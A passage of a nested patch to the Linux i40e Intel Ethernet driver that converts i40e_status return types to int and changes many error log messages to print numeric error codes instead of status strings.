+ 				     vsi->back->hw.aq.asq_last_status));
+ 	}
+@@ -3252,7 +3252,7 @@ static void i40e_restore_vlan(struct i40e_vsi *vsi)
+ int i40e_vsi_add_pvid(struct i40e_vsi *vsi, u16 vid)
+ {
+ 	struct i40e_vsi_context ctxt;
+-	i40e_status ret;
++	int ret;
+ 
+ 	vsi->info.valid_sections = cpu_to_le16(I40E_AQ_VSI_PROP_VLAN_VALID);
+ 	vsi->info.pvid = cpu_to_le16(vid);
+@@ -3265,8 +3265,8 @@ int i40e_vsi_add_pvid(struct i40e_vsi *vsi, u16 vid)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "add pvid failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&vsi->back->hw, ret),
++			 "add pvid failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&vsi->back->hw,
+ 				     vsi->back->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -3429,8 +3429,8 @@ static int i40e_configure_tx_ring(struct i40e_ring *ring)
+ 	u16 pf_q = vsi->base_queue + ring->queue_index;
+ 	struct i40e_hw *hw = &vsi->back->hw;
+ 	struct i40e_hmc_obj_txq tx_ctx;
+-	i40e_status err = 0;
+ 	u32 qtx_ctl = 0;
++	int err = 0;
+ 
+ 	if (ring_is_xdp(ring))
+ 		ring->xsk_pool = i40e_xsk_pool(ring);
+@@ -3554,7 +3554,7 @@ static int i40e_configure_rx_ring(struct i40e_ring *ring)
+ 	u16 pf_q = vsi->base_queue + ring->queue_index;
+ 	struct i40e_hw *hw = &vsi->back->hw;
+ 	struct i40e_hmc_obj_rxq rx_ctx;
+-	i40e_status err = 0;
++	int err = 0;
+ 	bool ok;
+ 	int ret;
+ 
+@@ -5525,16 +5525,16 @@ static int i40e_vsi_get_bw_info(struct i40e_vsi *vsi)
+ 	struct i40e_aqc_query_vsi_bw_config_resp bw_config = {0};
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
+ 	u32 tc_bw_max;
++	int ret;
+ 	int i;
+ 
+ 	/* Get the VSI level BW configuration */
+ 	ret = i40e_aq_query_vsi_bw_config(hw, vsi->seid, &bw_config, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi bw config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get PF vsi bw config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -5544,8 +5544,8 @@ static int i40e_vsi_get_bw_info(struct i40e_vsi *vsi)
+ 					       NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi ets bw config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get PF vsi ets bw config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -5586,7 +5586,7 @@ static int i40e_vsi_configure_bw_alloc(struct i40e_vsi *vsi, u8 enabled_tc,
+ {
+ 	struct i40e_aqc_configure_vsi_tc_bw_data bw_data;
+ 	struct i40e_pf *pf = vsi->back;
+-	i40e_status ret;
++	int ret;
+ 	int i;
+ 
+ 	/* There is no need to reset BW when mqprio mode is on.  */
+@@ -5734,8 +5734,8 @@ int i40e_update_adq_vsi_queues(struct i40e_vsi *vsi, int vsi_offset)
+ 
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "Update vsi config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++		dev_info(&pf->pdev->dev, "Update vsi config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -5790,8 +5790,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 						  &bw_config, NULL);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Failed querying vsi bw info, err %s aq_err %s\n",
+-				 i40e_stat_str(hw, ret),
++				 "Failed querying vsi bw info, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			goto out;
+ 		}
+@@ -5857,8 +5857,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Update vsi tc config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++			 "Update vsi tc config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -5870,8 +5870,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 	ret = i40e_vsi_get_bw_info(vsi);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed updating vsi bw info, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++			 "Failed updating vsi bw info, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -5962,8 +5962,8 @@ int i40e_set_bw_limit(struct i40e_vsi *vsi, u16 seid, u64 max_tx_rate)
+ 					  I40E_MAX_BW_INACTIVE_ACCUM, NULL);
+ 	if (ret)
+ 		dev_err(&pf->pdev->dev,
+-			"Failed set tx rate (%llu Mbps) for vsi->seid %u, err %s aq_err %s\n",
+-			max_tx_rate, seid, i40e_stat_str(&pf->hw, ret),
++			"Failed set tx rate (%llu Mbps) for vsi->seid %u, err %d aq_err %s\n",
++			max_tx_rate, seid, ret,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	return ret;
+ }
+@@ -6038,8 +6038,8 @@ static void i40e_remove_queue_channels(struct i40e_vsi *vsi)
+ 			last_aq_status = pf->hw.aq.asq_last_status;
+ 			if (ret)
+ 				dev_info(&pf->pdev->dev,
+-					 "Failed to delete cloud filter, err %s aq_err %s\n",
+-					 i40e_stat_str(&pf->hw, ret),
++					 "Failed to delete cloud filter, err %d aq_err %s\n",
++					 ret,
+ 					 i40e_aq_str(&pf->hw, last_aq_status));
+ 			kfree(cfilter);
+ 		}
+@@ -6173,8 +6173,8 @@ static int i40e_vsi_reconfig_rss(struct i40e_vsi *vsi, u16 rss_size)
+ 	ret = i40e_config_rss(vsi, seed, lut, vsi->rss_table_size);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot set RSS lut, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++			 "Cannot set RSS lut, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		kfree(lut);
+ 		return ret;
+@@ -6272,8 +6272,8 @@ static int i40e_add_channel(struct i40e_pf *pf, u16 uplink_seid,
+ 	ret = i40e_aq_add_vsi(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "add new vsi failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "add new vsi failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw,
+ 				     pf->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -6304,7 +6304,7 @@ static int i40e_channel_config_bw(struct i40e_vsi *vsi, struct i40e_channel *ch,
+ 				  u8 *bw_share)
+ {
+ 	struct i40e_aqc_configure_vsi_tc_bw_data bw_data;
+-	i40e_status ret;
++	int ret;
+ 	int i;
+ 
+ 	memset(&bw_data, 0, sizeof(bw_data));
+@@ -6340,9 +6340,9 @@ static int i40e_channel_config_tx_ring(struct i40e_pf *pf,
+ 				       struct i40e_vsi *vsi,
+ 				       struct i40e_channel *ch)
+ {
+-	i40e_status ret;
+-	int i;
+ 	u8 bw_share[I40E_MAX_TRAFFIC_CLASS] = {0};
++	int ret;
++	int i;
+ 
+ 	/* Enable ETS TCs with equal BW Share for now across all VSIs */
+ 	for (i = 0; i < I40E_MAX_TRAFFIC_CLASS; i++) {
+@@ -6518,8 +6518,8 @@ static int i40e_validate_and_set_switch_mode(struct i40e_vsi *vsi)
+ 					mode, NULL);
+ 	if (ret && hw->aq.asq_last_status != I40E_AQ_RC_ESRCH)
+ 		dev_err(&pf->pdev->dev,
+-			"couldn't set switch config bits, err %s aq_err %s\n",
+-			i40e_stat_str(hw, ret),
++			"couldn't set switch config bits, err %d aq_err %s\n",
++			ret,
+ 			i40e_aq_str(hw,
+ 				    hw->aq.asq_last_status));
+ 
+@@ -6719,8 +6719,8 @@ int i40e_veb_config_tc(struct i40e_veb *veb, u8 enabled_tc)
+ 						   &bw_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "VEB bw config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "VEB bw config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -6729,8 +6729,8 @@ int i40e_veb_config_tc(struct i40e_veb *veb, u8 enabled_tc)
+ 	ret = i40e_veb_get_bw_info(veb);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed getting veb bw config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed getting veb bw config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ 
+@@ -6813,8 +6813,8 @@ static int i40e_resume_port_tx(struct i40e_pf *pf)
+ 	ret = i40e_aq_resume_port_tx(hw, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Resume Port Tx failed, err %s aq_err %s\n",
+-			  i40e_stat_str(&pf->hw, ret),
++			 "Resume Port Tx failed, err %d aq_err %s\n",
++			  ret,
+ 			  i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* Schedule PF reset to recover */
+ 		set_bit(__I40E_PF_RESET_REQUESTED, pf->state);
+@@ -6838,8 +6838,8 @@ static int i40e_suspend_port_tx(struct i40e_pf *pf)
+ 	ret = i40e_aq_suspend_port_tx(hw, pf->mac_seid, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Suspend Port Tx failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Suspend Port Tx failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* Schedule PF reset to recover */
+ 		set_bit(__I40E_PF_RESET_REQUESTED, pf->state);
+@@ -6878,8 +6878,8 @@ static int i40e_hw_set_dcb_config(struct i40e_pf *pf,
+ 	ret = i40e_set_dcb_config(&pf->hw);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Set DCB Config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Set DCB Config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -6995,8 +6995,8 @@ int i40e_hw_dcb_config(struct i40e_pf *pf, struct i40e_dcbx_config *new_cfg)
+ 		 i40e_aqc_opc_modify_switching_comp_ets, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Modify Port ETS failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Modify Port ETS failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -7033,8 +7033,8 @@ int i40e_hw_dcb_config(struct i40e_pf *pf, struct i40e_dcbx_config *new_cfg)
+ 	ret = i40e_aq_dcb_updated(&pf->hw, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "DCB Updated failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "DCB Updated failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -7117,8 +7117,8 @@ int i40e_dcb_sw_default_config(struct i40e_pf *pf)
+ 		 i40e_aqc_opc_enable_switching_comp_ets, NULL);
+ 	if (err) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Enable Port ETS failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, err),
++			 "Enable Port ETS failed, err %d aq_err %s\n",
++			 err,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		err = -ENOENT;
+ 		goto out;
+@@ -7197,8 +7197,8 @@ static int i40e_init_pf_dcb(struct i40e_pf *pf)
+ 		pf->flags |= I40E_FLAG_DISABLE_FW_LLDP;
+ 	} else {
+ 		dev_info(&pf->pdev->dev,
+-			 "Query for DCB configuration failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, err),
++			 "Query for DCB configuration failed, err %d aq_err %s\n",
++			 err,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ 
+@@ -7416,15 +7416,15 @@ static void i40e_vsi_reinit_locked(struct i40e_vsi *vsi)
+  * @pf: board private structure
+  * @is_up: whether the link state should be forced up or down
+  **/
+-static i40e_status i40e_force_link_state(struct i40e_pf *pf, bool is_up)
++static int i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ {
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+ 	struct i40e_aq_set_phy_config config = {0};
+ 	bool non_zero_phy_type = is_up;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status err;
+ 	u64 mask;
+ 	u8 speed;
++	int err;
+ 
+ 	/* Card might've been put in an unstable state by other drivers
+ 	 * and applications, which causes incorrect speed values being
+@@ -7436,8 +7436,8 @@ static i40e_status i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 					   NULL);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"failed to get phy cap., ret =  %s last_status =  %s\n",
+-			i40e_stat_str(hw, err),
++			"failed to get phy cap., ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7448,8 +7448,8 @@ static i40e_status i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 					   NULL);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"failed to get phy cap., ret =  %s last_status =  %s\n",
+-			i40e_stat_str(hw, err),
++			"failed to get phy cap., ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7493,8 +7493,8 @@ static i40e_status i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"set phy config ret =  %s last_status =  %s\n",
+-			i40e_stat_str(&pf->hw, err),
++			"set phy config ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7657,11 +7657,11 @@ static void i40e_vsi_set_default_tc_config(struct i40e_vsi *vsi)
+  * This function deletes a mac filter on the channel VSI which serves as the
+  * macvlan. Returns 0 on success.
+  **/
+-static i40e_status i40e_del_macvlan_filter(struct i40e_hw *hw, u16 seid,
+-					   const u8 *macaddr, int *aq_err)
++static int i40e_del_macvlan_filter(struct i40e_hw *hw, u16 seid,
++				   const u8 *macaddr, int *aq_err)
+ {
+ 	struct i40e_aqc_remove_macvlan_element_data element;
+-	i40e_status status;
++	int status;
+ 
+ 	memset(&element, 0, sizeof(element));
+ 	ether_addr_copy(element.mac_addr, macaddr);
+@@ -7683,12 +7683,12 @@ static i40e_status i40e_del_macvlan_filter(struct i40e_hw *hw, u16 seid,
+  * This function adds a mac filter on the channel VSI which serves as the
+  * macvlan. Returns 0 on success.
+  **/
+-static i40e_status i40e_add_macvlan_filter(struct i40e_hw *hw, u16 seid,
+-					   const u8 *macaddr, int *aq_err)
++static int i40e_add_macvlan_filter(struct i40e_hw *hw, u16 seid,
++				   const u8 *macaddr, int *aq_err)
+ {
+ 	struct i40e_aqc_add_macvlan_element_data element;
+-	i40e_status status;
+ 	u16 cmd_flags = 0;
++	int status;
+ 
+ 	ether_addr_copy(element.mac_addr, macaddr);
+ 	element.vlan_tag = 0;
+@@ -7834,8 +7834,8 @@ static int i40e_fwd_ring_up(struct i40e_vsi *vsi, struct net_device *vdev,
+ 			rx_ring->netdev = NULL;
+ 		}
+ 		dev_info(&pf->pdev->dev,
+-			 "Error adding mac filter on macvlan err %s, aq_err %s\n",
+-			  i40e_stat_str(hw, ret),
++			 "Error adding mac filter on macvlan err %d, aq_err %s\n",
++			  ret,
+ 			  i40e_aq_str(hw, aq_err));
+ 		netdev_err(vdev, "L2fwd offload disabled to L2 filter error\n");
+ 	}
+@@ -7907,8 +7907,8 @@ static int i40e_setup_macvlans(struct i40e_vsi *vsi, u16 macvlan_cnt, u16 qcnt,
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Update vsi tc config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++			 "Update vsi tc config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -8123,8 +8123,8 @@ static void i40e_fwd_del(struct net_device *netdev, void *vdev)
+ 				ch->fwd = NULL;
+ 			} else {
+ 				dev_info(&pf->pdev->dev,
+-					 "Error deleting mac filter on macvlan err %s, aq_err %s\n",
+-					  i40e_stat_str(hw, ret),
++					 "Error deleting mac filter on macvlan err %d, aq_err %s\n",
++					  ret,
+ 					  i40e_aq_str(hw, aq_err));
+ 			}
+ 			break;
+@@ -8875,8 +8875,7 @@ static int i40e_delete_clsflower(struct i40e_vsi *vsi,
+ 	kfree(filter);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"Failed to delete cloud filter, err %s\n",
+-			i40e_stat_str(&pf->hw, err));
++			"Failed to delete cloud filter, err %d\n", err);
+ 		return i40e_aq_rc_to_posix(err, pf->hw.aq.asq_last_status);
+ 	}
+ 
+@@ -9438,8 +9437,8 @@ static int i40e_handle_lldp_event(struct i40e_pf *pf,
+ 			pf->flags &= ~I40E_FLAG_DCB_CAPABLE;
+ 		} else {
+ 			dev_info(&pf->pdev->dev,
+-				 "Failed querying DCB configuration data from firmware, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "Failed querying DCB configuration data from firmware, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 		}
+@@ -9887,8 +9886,8 @@ static void i40e_link_event(struct i40e_pf *pf)
+ {
+ 	struct i40e_vsi *vsi = pf->vsi[pf->lan_vsi];
+ 	u8 new_link_speed, old_link_speed;
+-	i40e_status status;
+ 	bool new_link, old_link;
++	int status;
+ #ifdef CONFIG_I40E_DCB
+ 	int err;
+ #endif /* CONFIG_I40E_DCB */
+@@ -10099,9 +10098,9 @@ static void i40e_clean_adminq_subtask(struct i40e_pf *pf)
+ 	struct i40e_arq_event_info event;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	u16 pending, i = 0;
+-	i40e_status ret;
+ 	u16 opcode;
+ 	u32 oldval;
++	int ret;
+ 	u32 val;
+ 
+ 	/* Do not run clean AQ when PF reset fails */
+@@ -10265,8 +10264,8 @@ static void i40e_enable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_get_vsi_params(&pf->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get PF vsi config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return;
+ 	}
+@@ -10277,8 +10276,8 @@ static void i40e_enable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "update vsi switch failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "update vsi switch failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ }
+@@ -10301,8 +10300,8 @@ static void i40e_disable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_get_vsi_params(&pf->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get PF vsi config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return;
+ 	}
+@@ -10313,8 +10312,8 @@ static void i40e_disable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "update vsi switch failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "update vsi switch failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ }
+@@ -10458,8 +10457,8 @@ static int i40e_get_capabilities(struct i40e_pf *pf,
+ 			buf_len = data_size;
+ 		} else if (pf->hw.aq.asq_last_status != I40E_AQ_RC_OK || err) {
+ 			dev_info(&pf->pdev->dev,
+-				 "capability discovery failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, err),
++				 "capability discovery failed, err %d aq_err %s\n",
++				 err,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return -ENODEV;
+@@ -10580,7 +10579,7 @@ static int i40e_rebuild_cloud_filters(struct i40e_vsi *vsi, u16 seid)
+ 	struct i40e_cloud_filter *cfilter;
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct hlist_node *node;
+-	i40e_status ret;
++	int ret;
+ 
+ 	/* Add cloud filters back if they exist */
+ 	hlist_for_each_entry_safe(cfilter, node, &pf->cloud_filter_list,
+@@ -10596,8 +10595,8 @@ static int i40e_rebuild_cloud_filters(struct i40e_vsi *vsi, u16 seid)
+ 
+ 		if (ret) {
+ 			dev_dbg(&pf->pdev->dev,
+-				"Failed to rebuild cloud filter, err %s aq_err %s\n",
+-				i40e_stat_str(&pf->hw, ret),
++				"Failed to rebuild cloud filter, err %d aq_err %s\n",
++				ret,
+ 				i40e_aq_str(&pf->hw,
+ 					    pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -10615,7 +10614,7 @@ static int i40e_rebuild_cloud_filters(struct i40e_vsi *vsi, u16 seid)
+ static int i40e_rebuild_channels(struct i40e_vsi *vsi)
+ {
+ 	struct i40e_channel *ch, *ch_tmp;
+-	i40e_status ret;
++	int ret;
+ 
+ 	if (list_empty(&vsi->ch_list))
+ 		return 0;
+@@ -10691,7 +10690,7 @@ static void i40e_clean_xps_state(struct i40e_vsi *vsi)
+ static void i40e_prep_for_reset(struct i40e_pf *pf)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret = 0;
++	int ret = 0;
+ 	u32 v;
+ 
+ 	clear_bit(__I40E_RESET_INTR_RECEIVED, pf->state);
+@@ -10796,7 +10795,7 @@ static void i40e_get_oem_version(struct i40e_hw *hw)
+ static int i40e_reset(struct i40e_pf *pf)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
++	int ret;
+ 
+ 	ret = i40e_pf_reset(hw);
+ 	if (ret) {
+@@ -10821,7 +10820,7 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 	const bool is_recovery_mode_reported = i40e_check_recovery_mode(pf);
+ 	struct i40e_vsi *vsi = pf->vsi[pf->lan_vsi];
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
++	int ret;
+ 	u32 val;
+ 	int v;
+ 
+@@ -10837,8 +10836,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 	/* rebuild the basics for the AdminQ, HMC, and initial HW switch */
+ 	ret = i40e_init_adminq(&pf->hw);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "Rebuild AdminQ failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++		dev_info(&pf->pdev->dev, "Rebuild AdminQ failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto clear_recovery;
+ 	}
+@@ -10949,8 +10948,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 					 I40E_AQ_EVENT_MEDIA_NA |
+ 					 I40E_AQ_EVENT_MODULE_QUAL_FAIL), NULL);
+ 	if (ret)
+-		dev_info(&pf->pdev->dev, "set phy mask fail, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++		dev_info(&pf->pdev->dev, "set phy mask fail, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* Rebuild the VSIs and VEBs that existed before reset.
+@@ -11053,8 +11052,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 		msleep(75);
+ 		ret = i40e_aq_set_link_restart_an(&pf->hw, true, NULL);
+ 		if (ret)
+-			dev_info(&pf->pdev->dev, "link restart failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++			dev_info(&pf->pdev->dev, "link restart failed, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 	}
+@@ -11085,9 +11084,9 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 	ret = i40e_set_promiscuous(pf, pf->cur_promisc);
+ 	if (ret)
+ 		dev_warn(&pf->pdev->dev,
+-			 "Failed to restore promiscuous setting: %s, err %s aq_err %s\n",
++			 "Failed to restore promiscuous setting: %s, err %d aq_err %s\n",
+ 			 pf->cur_promisc ? "on" : "off",
+-			 i40e_stat_str(&pf->hw, ret),
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	i40e_reset_all_vfs(pf, true);
+@@ -12221,8 +12220,8 @@ static int i40e_get_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 			(struct i40e_aqc_get_set_rss_key_data *)seed);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot get RSS key, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "Cannot get RSS key, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -12235,8 +12234,8 @@ static int i40e_get_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_get_rss_lut(hw, vsi->id, pf_lut, lut, lut_size);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot get RSS lut, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "Cannot get RSS lut, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -12511,11 +12510,11 @@ int i40e_reconfig_rss_queues(struct i40e_pf *pf, int queue_count)
+  * i40e_get_partition_bw_setting - Retrieve BW settings for this PF partition
+  * @pf: board private structure
+  **/
+-i40e_status i40e_get_partition_bw_setting(struct i40e_pf *pf)
++int i40e_get_partition_bw_setting(struct i40e_pf *pf)
+ {
+-	i40e_status status;
+ 	bool min_valid, max_valid;
+ 	u32 max_bw, min_bw;
++	int status;
+ 
+ 	status = i40e_read_bw_from_alt_ram(&pf->hw, &max_bw, &min_bw,
+ 					   &min_valid, &max_valid);
+@@ -12534,10 +12533,10 @@ i40e_status i40e_get_partition_bw_setting(struct i40e_pf *pf)
+  * i40e_set_partition_bw_setting - Set BW settings for this PF partition
+  * @pf: board private structure
+  **/
+-i40e_status i40e_set_partition_bw_setting(struct i40e_pf *pf)
++int i40e_set_partition_bw_setting(struct i40e_pf *pf)
+ {
+ 	struct i40e_aqc_configure_partition_bw_data bw_data;
+-	i40e_status status;
++	int status;
+ 
+ 	memset(&bw_data, 0, sizeof(bw_data));
+ 
+@@ -12556,12 +12555,12 @@ i40e_status i40e_set_partition_bw_setting(struct i40e_pf *pf)
+  * i40e_commit_partition_bw_setting - Commit BW settings for this PF partition
+  * @pf: board private structure
+  **/
